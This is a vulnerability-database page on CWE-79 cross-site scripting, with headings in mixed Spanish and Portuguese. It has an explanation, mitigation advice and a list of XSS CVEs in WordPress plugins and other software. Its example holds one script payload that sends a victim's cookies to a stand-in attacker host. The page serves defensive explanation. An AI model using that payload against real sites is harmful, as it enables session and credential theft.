Fallos del tipo CWE-79

28.949 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2022-1088—Page Security & Membership <= 1.5.15 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2021-32668MEDIUMCross-Site Scripting in Query Generator & Query ViewEPSS 0.6%CVE-2022-2280MEDIUMCross-site Scripting (XSS) - Stored in microweber/microweberEPSS 0.6%CVE-2022-1156—Books & Papers <= 0.20210223 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2021-24771—Inspirational Quote Rotator <= 1.0.0 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2023-3318LOWSourceCodester Resort Management System cross site scriptingEPSS 0.6%CVE-2022-0388—Interactive Medical Drawing of Human Body < 2.6 - Admin+ Stored XSSEPSS 0.6%CVE-2021-24995—HTML5 Responsive FAQ <= 2.8.5 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2022-1046—Visual Form Builder < 3.0.7 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2022-0649—Adrotate < 5.8.23 - Admin+ XSS via Group NameEPSS 0.6%CVE-2022-2364LOWSourceCodester Simple Parking Management System category cross site scriptingEPSS 0.6%CVE-2025-61417HIGHCross-Site Scripting (XSS) vulnerability exists in TastyIgniter 3.7.7, affecting the /admin/media_manager component. Attackers can upload a EPSS 0.6%CVE-2022-0662—Adrotate < 5.8.23 - Admin+ XSS via Advert NameEPSS 0.6%CVE-2022-1338—Easily Generate Rest API Url <= 1.0.0 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2024-1408MEDIUMProfilePress <= 4.14.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via [edit-profile-text-box] shortcodeEPSS 0.6%CVE-2025-1810MEDIUMPixsoft Vivaz Login Endpoint servlet cross site scriptingEPSS 0.6%CVE-2022-0389—WP Time Slots Booking Form < 1.1.63 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2022-23987—WS Form < 1.8.176 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2022-1027—Page Restriction WordPress < 1.2.7 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2021-24972—Pixel Cat Lite < 2.6.3 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%